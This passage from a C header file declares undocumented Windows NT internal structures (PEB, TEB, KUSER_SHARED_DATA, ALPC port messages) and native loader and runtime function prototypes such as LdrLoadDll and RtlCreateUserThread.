PPEB_LDR_DATA Ldr; 3847 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 3848 | PVOID SubSystemData; 3849 | PVOID ProcessHeap; 3850 | PRTL_CRITICAL_SECTION FastPebLock; 3851 | PVOID AtlThunkSListPtr; 3852 | PVOID IFEOKey; 3853 | union 3854 | { 3855 | ULONG CrossProcessFlags; 3856 | struct 3857 | { 3858 | ULONG ProcessInJob : 1; 3859 | ULONG ProcessInitializing : 1; 3860 | ULONG ProcessUsingVEH : 1; 3861 | ULONG ProcessUsingVCH : 1; 3862 | ULONG ProcessUsingFTH : 1; 3863 | ULONG ReservedBits0 : 27; 3864 | }; 3865 | ULONG EnvironmentUpdateCount; 3866 | }; 3867 | union 3868 | { 3869 | PVOID KernelCallbackTable; 3870 | PVOID UserSharedInfoPtr; 3871 | }; 3872 | ULONG SystemReserved[1]; 3873 | ULONG AtlThunkSListPtr32; 3874 | PVOID ApiSetMap; 3875 | ULONG TlsExpansionCounter; 3876 | PVOID TlsBitmap; 3877 | ULONG TlsBitmapBits[2]; 3878 | PVOID ReadOnlySharedMemoryBase; 3879 | PVOID HotpatchInformation; 3880 | PVOID *ReadOnlyStaticServerData; 3881 | PVOID AnsiCodePageData; 3882 | PVOID OemCodePageData; 3883 | PVOID UnicodeCaseTableData; 3884 | 3885 | ULONG NumberOfProcessors; 3886 | ULONG NtGlobalFlag; 3887 | 3888 | LARGE_INTEGER CriticalSectionTimeout; 3889 | SIZE_T HeapSegmentReserve; 3890 | SIZE_T HeapSegmentCommit; 3891 | SIZE_T HeapDeCommitTotalFreeThreshold; 3892 | SIZE_T HeapDeCommitFreeBlockThreshold; 3893 | 3894 | ULONG NumberOfHeaps; 3895 | ULONG MaximumNumberOfHeaps; 3896 | PVOID *ProcessHeaps; 3897 | 3898 | PVOID GdiSharedHandleTable; 3899 | PVOID ProcessStarterHelper; 3900 | ULONG GdiDCAttributeList; 3901 | 3902 | PRTL_CRITICAL_SECTION LoaderLock; 3903 | 3904 | ULONG OSMajorVersion; 3905 | ULONG OSMinorVersion; 3906 | USHORT OSBuildNumber; 3907 | USHORT OSCSDVersion; 3908 | ULONG OSPlatformId; 3909 | ULONG ImageSubsystem; 3910 | ULONG ImageSubsystemMajorVersion; 3911 | ULONG ImageSubsystemMinorVersion; 3912 | ULONG_PTR ImageProcessAffinityMask; 3913 | GDI_HANDLE_BUFFER GdiHandleBuffer; 3914 | PVOID PostProcessInitRoutine; 3915 | 3916 | PVOID TlsExpansionBitmap; 3917 | ULONG TlsExpansionBitmapBits[32]; 3918 | 3919 | ULONG SessionId; 3920 | 3921 | ULARGE_INTEGER AppCompatFlags; 3922 | ULARGE_INTEGER AppCompatFlagsUser; 3923 | PVOID pShimData; 3924 | PVOID AppCompatInfo; 3925 | 3926 | UNICODE_STRING CSDVersion; 3927 | 3928 | PVOID ActivationContextData; 3929 | PVOID ProcessAssemblyStorageMap; 3930 | PVOID SystemDefaultActivationContextData; 3931 | PVOID SystemAssemblyStorageMap; 3932 | 3933 | SIZE_T MinimumStackCommit; 3934 | 3935 | PVOID *FlsCallback; 3936 | LIST_ENTRY FlsListHead; 3937 | PVOID FlsBitmap; 3938 | ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; 3939 | ULONG FlsHighIndex; 3940 | 3941 | PVOID WerRegistrationData; 3942 | PVOID WerShipAssertPtr; 3943 | PVOID pContextData; 3944 | PVOID pImageHeaderHash; 3945 | union 3946 | { 3947 | ULONG TracingFlags; 3948 | struct 3949 | { 3950 | ULONG HeapTracingEnabled : 1; 3951 | ULONG CritSecTracingEnabled : 1; 3952 | ULONG SpareTracingBits : 30; 3953 | }; 3954 | }; 3955 | } PEB, *PPEB; 3956 | 3957 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT 3958 | { 3959 | ULONG Flags; 3960 | PSTR FrameName; 3961 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; 3962 | 3963 | typedef struct _TEB_ACTIVE_FRAME 3964 | { 3965 | ULONG Flags; 3966 | struct _TEB_ACTIVE_FRAME *Previous; 3967 | PTEB_ACTIVE_FRAME_CONTEXT Context; 3968 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; 3969 | 3970 | #define GDI_BATCH_BUFFER_SIZE 310 3971 | 3972 | typedef struct _GDI_TEB_BATCH { 3973 | ULONG Offset; 3974 | UCHAR Alignment[4]; 3975 | ULONG_PTR HDC; 3976 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 3977 | } GDI_TEB_BATCH, *PGDI_TEB_BATCH; 3978 | 3979 | typedef struct _TEB 3980 | { 3981 | NT_TIB NtTib; 3982 | 3983 | PVOID EnvironmentPointer; 3984 | CLIENT_ID ClientId; 3985 | PVOID ActiveRpcHandle; 3986 | PVOID ThreadLocalStoragePointer; 3987 | PPEB ProcessEnvironmentBlock; 3988 | 3989 | ULONG LastErrorValue; 3990 | ULONG CountOfOwnedCriticalSections; 3991 | PVOID CsrClientThread; 3992 | PVOID Win32ThreadInfo; 3993 | ULONG User32Reserved[26]; 3994 | ULONG UserReserved[5]; 3995 | PVOID WOW32Reserved; 3996 | LCID CurrentLocale; 3997 | ULONG FpSoftwareStatusRegister; 3998 | PVOID SystemReserved1[54]; 3999 | NTSTATUS ExceptionCode; 4000 | PVOID ActivationContextStackPointer; 4001 | #if defined(_M_X64) 4002 | UCHAR SpareBytes[24]; 4003 | #else 4004 | UCHAR SpareBytes[36]; 4005 | #endif 4006 | ULONG TxFsContext; 4007 | 4008 | GDI_TEB_BATCH GdiTebBatch; 4009 | CLIENT_ID RealClientId; 4010 | HANDLE GdiCachedProcessHandle; 4011 | ULONG GdiClientPID; 4012 | ULONG GdiClientTID; 4013 | PVOID GdiThreadLocalInfo; 4014 | ULONG_PTR Win32ClientInfo[62]; 4015 | PVOID glDispatchTable[233]; 4016 | ULONG_PTR glReserved1[29]; 4017 | PVOID glReserved2; 4018 | PVOID glSectionInfo; 4019 | PVOID glSection; 4020 | PVOID glTable; 4021 | PVOID glCurrentRC; 4022 | PVOID glContext; 4023 | 4024 | NTSTATUS LastStatusValue; 4025 | UNICODE_STRING StaticUnicodeString; 4026 | WCHAR StaticUnicodeBuffer[261]; 4027 | 4028 | PVOID DeallocationStack; 4029 | PVOID TlsSlots[64]; 4030 | LIST_ENTRY TlsLinks; 4031 | 4032 | PVOID Vdm; 4033 | PVOID ReservedForNtRpc; 4034 | PVOID DbgSsReserved[2]; 4035 | 4036 | ULONG HardErrorMode; 4037 | #if defined(_M_X64) 4038 | PVOID Instrumentation[11]; 4039 | #else 4040 | PVOID Instrumentation[9]; 4041 | #endif 4042 | GUID ActivityId; 4043 | 4044 | PVOID SubProcessTag; 4045 | PVOID EtwLocalData; 4046 | PVOID EtwTraceData; 4047 | PVOID WinSockData; 4048 | ULONG GdiBatchCount; 4049 | 4050 | union 4051 | { 4052 | PROCESSOR_NUMBER CurrentIdealProcessor; 4053 | ULONG IdealProcessorValue; 4054 | struct 4055 | { 4056 | UCHAR ReservedPad0; 4057 | UCHAR ReservedPad1; 4058 | UCHAR ReservedPad2; 4059 | UCHAR IdealProcessor; 4060 | }; 4061 | }; 4062 | 4063 | ULONG GuaranteedStackBytes; 4064 | PVOID ReservedForPerf; 4065 | PVOID ReservedForOle; 4066 | ULONG WaitingOnLoaderLock; 4067 | PVOID SavedPriorityState; 4068 | ULONG_PTR SoftPatchPtr1; 4069 | PVOID ThreadPoolData; 4070 | PVOID *TlsExpansionSlots; 4071 | #if defined(_M_X64) 4072 | PVOID DeallocationBStore; 4073 | PVOID BStoreLimit; 4074 | #endif 4075 | ULONG MuiGeneration; 4076 | ULONG IsImpersonating; 4077 | PVOID NlsCache; 4078 | PVOID pShimData; 4079 | ULONG HeapVirtualAffinity; 4080 | HANDLE CurrentTransactionHandle; 4081 | PTEB_ACTIVE_FRAME ActiveFrame; 4082 | PVOID FlsData; 4083 | 4084 | PVOID PreferredLanguages; 4085 | PVOID UserPrefLanguages; 4086 | PVOID MergedPrefLanguages; 4087 | ULONG MuiImpersonation; 4088 | 4089 | union 4090 | { 4091 | USHORT CrossTebFlags; 4092 | USHORT SpareCrossTebBits : 16; 4093 | }; 4094 | union 4095 | { 4096 | USHORT SameTebFlags; 4097 | struct 4098 | { 4099 | USHORT SafeThunkCall : 1; 4100 | USHORT InDebugPrint : 1; 4101 | USHORT HasFiberData : 1; 4102 | USHORT SkipThreadAttach : 1; 4103 | USHORT WerInShipAssertCode : 1; 4104 | USHORT RanProcessInit : 1; 4105 | USHORT ClonedThread : 1; 4106 | USHORT SuppressDebugMsg : 1; 4107 | USHORT DisableUserStackWalk : 1; 4108 | USHORT RtlExceptionAttached : 1; 4109 | USHORT InitialThread : 1; 4110 | USHORT SpareSameTebBits : 1; 4111 | }; 4112 | }; 4113 | 4114 | PVOID TxnScopeEnterCallback; 4115 | PVOID TxnScopeExitCallback; 4116 | PVOID TxnScopeContext; 4117 | ULONG LockCount; 4118 | ULONG SpareUlong0; 4119 | PVOID ResourceRetValue; 4120 | } TEB, *PTEB; 4121 | 4122 | typedef struct _PROCESS_DEVICEMAP_INFORMATION { 4123 | union { 4124 | struct { 4125 | HANDLE DirectoryHandle; 4126 | } Set; 4127 | struct { 4128 | ULONG DriveMap; 4129 | UCHAR DriveType[32]; 4130 | } Query; 4131 | }; 4132 | } PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION; 4133 | 4134 | __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } 4135 | 4136 | /* 4137 | ** PEB/TEB END 4138 | */ 4139 | 4140 | /* 4141 | ** ALPC START 4142 | */ 4143 | 4144 | typedef struct _PORT_MESSAGE { 4145 | union { 4146 | struct { 4147 | CSHORT DataLength; 4148 | CSHORT TotalLength; 4149 | } s1; 4150 | ULONG Length; 4151 | } u1; 4152 | union { 4153 | struct { 4154 | CSHORT Type; 4155 | CSHORT DataInfoOffset; 4156 | } s2; 4157 | ULONG ZeroInit; 4158 | } u2; 4159 | union { 4160 | CLIENT_ID ClientId; 4161 | double DoNotUseThisField; // Force quadword alignment 4162 | } u3; 4163 | ULONG MessageId; 4164 | union { 4165 | ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message 4166 | ULONG CallbackId; // Only valid on LPC_REQUEST message 4167 | } u4; 4168 | UCHAR Reserved[8]; 4169 | } PORT_MESSAGE, *PPORT_MESSAGE; 4170 | 4171 | // end_ntsrv 4172 | 4173 | typedef struct _PORT_DATA_ENTRY { 4174 | PVOID Base; 4175 | ULONG Size; 4176 | } PORT_DATA_ENTRY, *PPORT_DATA_ENTRY; 4177 | 4178 | typedef struct _PORT_DATA_INFORMATION { 4179 | ULONG CountDataEntries; 4180 | PORT_DATA_ENTRY DataEntries[1]; 4181 | } PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION; 4182 | 4183 | #define LPC_REQUEST 1 4184 | #define LPC_REPLY 2 4185 | #define LPC_DATAGRAM 3 4186 | #define LPC_LOST_REPLY 4 4187 | #define LPC_PORT_CLOSED 5 4188 | #define LPC_CLIENT_DIED 6 4189 | #define LPC_EXCEPTION 7 4190 | #define LPC_DEBUG_EVENT 8 4191 | #define LPC_ERROR_EVENT 9 4192 | #define LPC_CONNECTION_REQUEST 10 4193 | 4194 | #define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE) 4195 | #define PORT_MAXIMUM_MESSAGE_LENGTH 256 4196 | 4197 | typedef struct _LPC_CLIENT_DIED_MSG { 4198 | PORT_MESSAGE PortMsg; 4199 | LARGE_INTEGER CreateTime; 4200 | } LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG; 4201 | 4202 | //#pragma pack(push, 1) 4203 | typedef struct _PORT_VIEW { 4204 | ULONG Length; 4205 | HANDLE SectionHandle; 4206 | ULONG SectionOffset; 4207 | SIZE_T ViewSize; 4208 | PVOID ViewBase; 4209 | PVOID ViewRemoteBase; 4210 | } PORT_VIEW, *PPORT_VIEW; 4211 | 4212 | typedef struct _REMOTE_PORT_VIEW { 4213 | ULONG Length; 4214 | SIZE_T ViewSize; 4215 | PVOID ViewBase; 4216 | } REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; 4217 | //#pragma pack(pop) 4218 | /* 4219 | ** ALPC END 4220 | */ 4221 | 4222 | /* 4223 | ** KUSER_SHARED_DATA START 4224 | */ 4225 | 4226 | typedef struct _KSYSTEM_TIME { 4227 | ULONG LowPart; 4228 | LONG High1Time; 4229 | LONG High2Time; 4230 | } KSYSTEM_TIME, *PKSYSTEM_TIME; 4231 | 4232 | typedef enum _NT_PRODUCT_TYPE { 4233 | NtProductWinNt = 1, 4234 | NtProductLanManNt, 4235 | NtProductServer 4236 | } NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE; 4237 | 4238 | #define PROCESSOR_FEATURE_MAX 64 4239 | 4240 | typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE { 4241 | StandardDesign, // None == 0 == standard design 4242 | NEC98x86, // NEC PC98xx series on X86 4243 | EndAlternatives // past end of known alternatives 4244 | } ALTERNATIVE_ARCHITECTURE_TYPE; 4245 | 4246 | // 4247 | // Define Address of User Shared Data 4248 | // 4249 | #define MM_SHARED_USER_DATA_VA 0x000000007FFE0000 4250 | 4251 | // 4252 | // WARNING: this definition is compatibility only. 4253 | // Structure is incomplete. Only important fields. 4254 | // 4255 | typedef struct _KUSER_SHARED_DATA_COMPAT { 4256 | ULONG TickCountLowDeprecated; 4257 | ULONG TickCountMultiplier; 4258 | volatile KSYSTEM_TIME InterruptTime; 4259 | volatile KSYSTEM_TIME SystemTime; 4260 | volatile KSYSTEM_TIME TimeZoneBias; 4261 | USHORT ImageNumberLow; 4262 | USHORT ImageNumberHigh; 4263 | WCHAR NtSystemRoot[260]; 4264 | ULONG MaxStackTraceDepth; 4265 | ULONG CryptoExponent; 4266 | ULONG TimeZoneId; 4267 | ULONG LargePageMinimum; 4268 | 4269 | union { 4270 | ULONG Reserved2[7]; 4271 | struct { 4272 | ULONG AitSamplingValue; 4273 | ULONG AppCompatFlag; 4274 | struct { 4275 | ULONG LowPart; 4276 | ULONG HighPart; 4277 | } RNGSeedVersion; 4278 | ULONG GlobalValidationRunlevel; 4279 | ULONG TimeZoneBiasStamp; 4280 | ULONG ReservedField; 4281 | }; 4282 | }; 4283 | 4284 | NT_PRODUCT_TYPE NtProductType; 4285 | BOOLEAN ProductTypeIsValid; 4286 | ULONG NtMajorVersion; 4287 | ULONG NtMinorVersion; 4288 | BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX]; 4289 | ULONG Reserved1; 4290 | ULONG Reserved3; 4291 | volatile ULONG TimeSlip; 4292 | ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture; 4293 | ULONG AltArchitecturePad; 4294 | LARGE_INTEGER SystemExpirationDate; 4295 | ULONG SuiteMask; 4296 | BOOLEAN KdDebuggerEnabled; 4297 | 4298 | union { 4299 | UCHAR MitigationPolicies; 4300 | struct { 4301 | UCHAR NXSupportPolicy : 2; 4302 | UCHAR SEHValidationPolicy : 2; 4303 | UCHAR CurDirDevicesSkippedForDlls : 2; 4304 | UCHAR Reserved : 2; 4305 | UCHAR Reserved6[2]; 4306 | }; 4307 | }; 4308 | 4309 | volatile ULONG ActiveConsoleId; 4310 | volatile ULONG DismountCount; 4311 | ULONG ComPlusPackage; 4312 | ULONG LastSystemRITEventTickCount; 4313 | ULONG NumberOfPhysicalPages; 4314 | BOOLEAN SafeBootMode; 4315 | UCHAR Reserved12[3]; 4316 | 4317 | union { 4318 | ULONG SharedDataFlags; 4319 | struct { 4320 | ULONG DbgErrorPortPresent : 1; 4321 | ULONG DbgElevationEnabled : 1; 4322 | ULONG DbgVirtEnabled : 1; 4323 | ULONG DbgInstallerDetectEnabled: 1; 4324 | ULONG DbgLkgEnabled : 1; 4325 | ULONG DbgDynProcessorEnabled : 1; 4326 | ULONG DbgConsoleBrokerEnabled : 1; 4327 | ULONG DbgSecureBootEnabled : 1; 4328 | ULONG DbgMultiSessionSku : 1; 4329 | ULONG DbgMultiUsersInSessionSku : 1; 4330 | ULONG SpareBits : 22; 4331 | }; 4332 | }; 4333 | 4334 | //incomplete 4335 | 4336 | } KUSER_SHARED_DATA, *PKUSER_SHARED_DATA; 4337 | 4338 | #define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA) 4339 | 4340 | /* 4341 | ** KUSER_SHARED_DATA END 4342 | */ 4343 | 4344 | /* 4345 | ** FLT MANAGER START 4346 | */ 4347 | 4348 | #define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS 0x1 4349 | #define FLTFL_FILTERING_INITIATED 0x2 4350 | #define FLTFL_NAME_PROVIDER 0x4 4351 | #define FLTFL_SUPPORTS_PIPES_MAILSLOTS 0x8 4352 | 4353 | #define FLT_OBFL_DRAINING 0x1 4354 | #define FLT_OBFL_ZOMBIED 0x2 4355 | #define FLT_OBFL_TYPE_INSTANCE 0x1000000 4356 | #define FLT_OBFL_TYPE_FILTER 0x2000000 4357 | #define FLT_OBFL_TYPE_VOLUME 0x4000000 4358 | 4359 | typedef struct _FLT_OBJECT { 4360 | ULONG Flags; 4361 | ULONG PointerCount; 4362 | EX_RUNDOWN_REF RundownRef; 4363 | LIST_ENTRY PrimaryLink; 4364 | } FLT_OBJECT, *PFLT_OBJECT; 4365 | 4366 | typedef struct _FLT_SERVER_PORT_OBJECT { 4367 | LIST_ENTRY FilterLink; 4368 | PVOID ConnectNotify; 4369 | PVOID DisconnectNotify; 4370 | PVOID MessageNotify; 4371 | PVOID Filter; 4372 | PVOID Cookie; 4373 | ULONG Flags; 4374 | ULONG NumberOfConnections; 4375 | ULONG MaxConnections; 4376 | } FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; 4377 | 4378 | /* 4379 | ** FLT MANAGER END 4380 | */ 4381 | 4382 | /* 4383 | ** RTL START 4384 | */ 4385 | 4386 | typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)( 4387 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters 4388 | ); 4389 | 4390 | typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)( 4391 | PVOID ThreadParameter 4392 | ); 4393 | 4394 | typedef struct _RTL_USER_PROCESS_INFORMATION { 4395 | ULONG Length; 4396 | HANDLE Process; 4397 | HANDLE Thread; 4398 | CLIENT_ID ClientId; 4399 | SECTION_IMAGE_INFORMATION ImageInformation; 4400 | } RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; 4401 | 4402 | // 4403 | // This structure is used only by Wow64 processes. The offsets 4404 | // of structure elements should the same as viewed by a native Win64 application. 4405 | // 4406 | typedef struct _RTL_USER_PROCESS_INFORMATION64 { 4407 | ULONG Length; 4408 | LONGLONG Process; 4409 | LONGLONG Thread; 4410 | CLIENT_ID64 ClientId; 4411 | SECTION_IMAGE_INFORMATION64 ImageInformation; 4412 | } RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64; 4413 | 4414 | /* 4415 | ** RTL END 4416 | */ 4417 | 4418 | /* 4419 | ** LDR START 4420 | */ 4421 | 4422 | typedef 4423 | VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( 4424 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 4425 | _In_ PVOID Context, 4426 | _Inout_ BOOLEAN *StopEnumeration 4427 | ); 4428 | 4429 | typedef 4430 | VOID (CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)( 4431 | _In_ ULONG NotificationReason, 4432 | _In_ PCLDR_DLL_NOTIFICATION_DATA NotificationData, 4433 | _In_opt_ PVOID Context 4434 | ); 4435 | 4436 | NTSTATUS NTAPI LdrAccessResource( 4437 | _In_ PVOID DllHandle, 4438 | _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry, 4439 | _Out_opt_ PVOID *Address, 4440 | _Out_opt_ PULONG Size 4441 | ); 4442 | 4443 | NTSTATUS NTAPI LdrAddRefDll( 4444 | ULONG Flags, 4445 | PVOID DllHandle 4446 | ); 4447 | 4448 | NTSTATUS NTAPI LdrEnumerateLoadedModules( 4449 | _In_opt_ ULONG Flags, 4450 | _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, 4451 | _In_opt_ PVOID Context 4452 | ); 4453 | 4454 | NTSTATUS NTAPI LdrFindResource_U( 4455 | _In_ PVOID DllHandle, 4456 | _In_ CONST ULONG_PTR* ResourceIdPath, 4457 | _In_ ULONG ResourceIdPathLength, 4458 | _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry 4459 | ); 4460 | 4461 | NTSTATUS NTAPI LdrFindEntryForAddress( 4462 | _In_ PVOID Address, 4463 | _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry 4464 | ); 4465 | 4466 | NTSTATUS NTAPI LdrGetDllHandle( 4467 | _In_opt_ PCWSTR DllPath, 4468 | _In_opt_ PULONG DllCharacteristics, 4469 | _In_ PCUNICODE_STRING DllName, 4470 | _Out_ PVOID *DllHandle 4471 | ); 4472 | 4473 | NTSTATUS NTAPI LdrGetProcedureAddress( 4474 | _In_ PVOID DllHandle, 4475 | _In_opt_ CONST ANSI_STRING* ProcedureName, 4476 | _In_opt_ ULONG ProcedureNumber, 4477 | _Out_ PVOID *ProcedureAddress 4478 | ); 4479 | 4480 | NTSTATUS NTAPI LdrLoadDll( 4481 | _In_opt_ PCWSTR DllPath, 4482 | _In_opt_ PULONG DllCharacteristics, 4483 | _In_ PCUNICODE_STRING DllName, 4484 | _Out_ PVOID *DllHandle 4485 | ); 4486 | 4487 | NTSTATUS NTAPI LdrQueryProcessModuleInformation( 4488 | _Out_ PRTL_PROCESS_MODULES ModuleInformation, 4489 | _In_ ULONG ModuleInformationLength, 4490 | _Out_opt_ PULONG ReturnLength 4491 | ); 4492 | 4493 | NTSTATUS NTAPI LdrUnloadDll( 4494 | _In_ PVOID DllHandle 4495 | ); 4496 | 4497 | NTSTATUS NTAPI LdrRegisterDllNotification( 4498 | _In_ ULONG Flags, 4499 | _In_ PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction, 4500 | _In_opt_ PVOID Context, 4501 | _Out_ PVOID *Cookie 4502 | ); 4503 | 4504 | NTSTATUS NTAPI LdrUnregisterDllNotification( 4505 | _In_ PVOID Cookie 4506 | ); 4507 | 4508 | NTSTATUS NTAPI LdrResSearchResource( 4509 | _In_ PVOID File, 4510 | _In_ CONST ULONG_PTR* ResIds, 4511 | _In_ ULONG ResIdCount, 4512 | _In_ ULONG Flags, 4513 | _Out_ LPVOID *Resource, 4514 | _Out_ ULONG_PTR *Size, 4515 | _In_opt_ USHORT *FoundLanguage, 4516 | _In_opt_ ULONG *FoundLanguageLength 4517 | ); 4518 | 4519 | NTSTATUS NTAPI LdrOpenImageFileOptionsKey( 4520 | _In_ PCUNICODE_STRING ImagePathName, 4521 | _In_ BOOLEAN Wow64Path, 4522 | _Out_ PHANDLE KeyHandle 4523 | ); 4524 | 4525 | NTSTATUS NTAPI LdrQueryImageFileExecutionOptions( 4526 | _In_ PCUNICODE_STRING ImagePathName, 4527 | _In_ PCWSTR OptionName, 4528 | _In_ ULONG Type, 4529 | _Out_ PVOID Buffer, 4530 | _In_ ULONG BufferSize, 4531 | _Out_opt_ PULONG ResultSize 4532 | ); 4533 | 4534 | NTSTATUS NTAPI LdrQueryImageFileExecutionOptionsEx( 4535 | _In_ PCUNICODE_STRING ImagePathName, 4536 | _In_ PCWSTR OptionName, 4537 | _In_ ULONG Type, 4538 | _Out_ PVOID Buffer, 4539 | _In_ ULONG BufferSize, 4540 | _Out_opt_ PULONG ResultSize, 4541 | _In_ BOOLEAN Wow64Path 4542 | ); 4543 | 4544 | NTSTATUS NTAPI LdrQueryImageFileKeyOption( 4545 | _In_ HANDLE KeyHandle, 4546 | _In_ PCWSTR OptionName, 4547 | _In_ ULONG Type, 4548 | _Out_ PVOID Buffer, 4549 | _In_ ULONG BufferSize, 4550 | _Out_opt_ PULONG ResultSize 4551 | ); 4552 | 4553 | /* 4554 | ** LDR END 4555 | */ 4556 | 4557 | typedef PVOID PHEAD; 4558 | 4559 | typedef struct _HANDLEENTRY { 4560 | PHEAD phead; // Pointer to the Object. 4561 | PVOID pOwner; // PTI or PPI 4562 | BYTE bType; // Object handle type 4563 | BYTE bFlags; // Flags 4564 | WORD wUniq; // Access count. 4565 | } HANDLEENTRY, *PHANDLEENTRY; 4566 | 4567 | typedef struct _SERVERINFO { 4568 | WORD wRIPFlags; 4569 | WORD wSRVIFlags; 4570 | WORD wRIPPID; 4571 | WORD wRIPError; 4572 | ULONG cHandleEntries; 4573 | // incomplete 4574 | } SERVERINFO, *PSERVERINFO; 4575 | 4576 | typedef struct _SHAREDINFO { 4577 | PSERVERINFO psi; 4578 | PHANDLEENTRY aheList; 4579 | ULONG HeEntrySize; 4580 | // incomplete 4581 | } SHAREDINFO, *PSHAREDINFO; 4582 | 4583 | typedef struct _USERCONNECT 4584 | { 4585 | ULONG ulVersion; 4586 | ULONG ulCurrentVersion; 4587 | DWORD dwDispatchCount; 4588 | SHAREDINFO siClient; 4589 | } USERCONNECT, *PUSERCONNECT; 4590 | 4591 | /* 4592 | ** Csr Runtime START 4593 | */ 4594 | 4595 | ULONG NTAPI CsrGetProcessId( 4596 | ); 4597 | 4598 | NTSTATUS NTAPI CsrClientConnectToServer( 4599 | _In_ PWSTR ObjectDirectory, 4600 | _In_ ULONG ServerDllIndex, 4601 | _Inout_ PVOID ConnectionInformation, 4602 | _Inout_ ULONG *ConnectionInformationLength, 4603 | _Out_ PBOOLEAN CalledFromServer 4604 | ); 4605 | 4606 | /* 4607 | ** Csr Runtime END 4608 | */ 4609 | 4610 | /* 4611 | ** Runtime Library API START 4612 | */ 4613 | 4614 | NTSTATUS NTAPI RtlCreateEnvironment( 4615 | _In_ BOOLEAN CloneCurrentEnvironment, 4616 | _Out_ PVOID *Environment 4617 | ); 4618 | 4619 | NTSTATUS NTAPI RtlDestroyEnvironment( 4620 | _In_ PVOID Environment 4621 | ); 4622 | 4623 | NTSTATUS NTAPI RtlCreateProcessParameters( 4624 | _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, 4625 | _In_ PUNICODE_STRING ImagePathName, 4626 | _In_opt_ PUNICODE_STRING DllPath, 4627 | _In_opt_ PUNICODE_STRING CurrentDirectory, 4628 | _In_opt_ PUNICODE_STRING CommandLine, 4629 | _In_opt_ PVOID Environment, 4630 | _In_opt_ PUNICODE_STRING WindowTitle, 4631 | _In_opt_ PUNICODE_STRING DesktopInfo, 4632 | _In_opt_ PUNICODE_STRING ShellInfo, 4633 | _In_opt_ PUNICODE_STRING RuntimeData 4634 | ); 4635 | 4636 | NTSTATUS NTAPI RtlDestroyProcessParameters( 4637 | _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters 4638 | ); 4639 | 4640 | NTSTATUS NTAPI RtlCreateProcessParametersEx( 4641 | _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, 4642 | _In_ PUNICODE_STRING ImagePathName, 4643 | _In_opt_ PUNICODE_STRING DllPath, 4644 | _In_opt_ PUNICODE_STRING CurrentDirectory, 4645 | _In_opt_ PUNICODE_STRING CommandLine, 4646 | _In_opt_ PVOID Environment, 4647 | _In_opt_ PUNICODE_STRING WindowTitle, 4648 | _In_opt_ PUNICODE_STRING DesktopInfo, 4649 | _In_opt_ PUNICODE_STRING ShellInfo, 4650 | _In_opt_ PUNICODE_STRING RuntimeData, 4651 | _In_ ULONG Flags); 4652 | 4653 | NTSTATUS NTAPI RtlCreateUserProcess( 4654 | PUNICODE_STRING NtImagePathName, 4655 | ULONG Attributes, 4656 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters, 4657 | PSECURITY_DESCRIPTOR ProcessSecurityDescriptor, 4658 | PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, 4659 | HANDLE ParentProcess, 4660 | BOOLEAN InheritHandles, 4661 | HANDLE DebugPort, 4662 | HANDLE ExceptionPort, 4663 | PRTL_USER_PROCESS_INFORMATION ProcessInformation 4664 | ); 4665 | 4666 | NTSTATUS NTAPI RtlCreateUserThread( 4667 | _In_ HANDLE Process, 4668 | _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, 4669 | _In_ BOOLEAN CreateSuspended, 4670 | _In_ ULONG StackZeroBits, 4671 | _In_opt_ SIZE_T MaximumStackSize, 4672 | _In_opt_ SIZE_T InitialStackSize, 4673 | _In_ PUSER_THREAD_START_ROUTINE StartAddress, 4674 | _In_opt_ PVOID Parameter, 4675 | _Out_opt_ PHANDLE Thread, 4676 | _Out_opt_ PCLIENT_ID ClientId 4677 | ); 4678 | 4679 | VOID NTAPI RtlExitUserThread( 4680 | IN NTSTATUS ExitStatus 4681 | ); 4682 | 4683 | VOID NTAPI RtlFreeUserThreadStack( 4684 | HANDLE hProcess, 4685 | HANDLE hThread 4686 | ); 4687 | 4688 | ULONG NTAPI RtlRandomEx( 4689 | _Inout_ PULONG Seed 4690 | ); 4691 | 4692 | PVOID NTAPI RtlAddVectoredExceptionHandler( 4693 | _In_ ULONG First, 4694 | _In_ PVECTORED_EXCEPTION_HANDLER Handler 4695 | ); 4696 | 4697 | ULONG NTAPI RtlRemoveVectoredExceptionHandler( 4698 | _In_ PVOID Handle 4699 | ); 4700 | 4701 | VOID 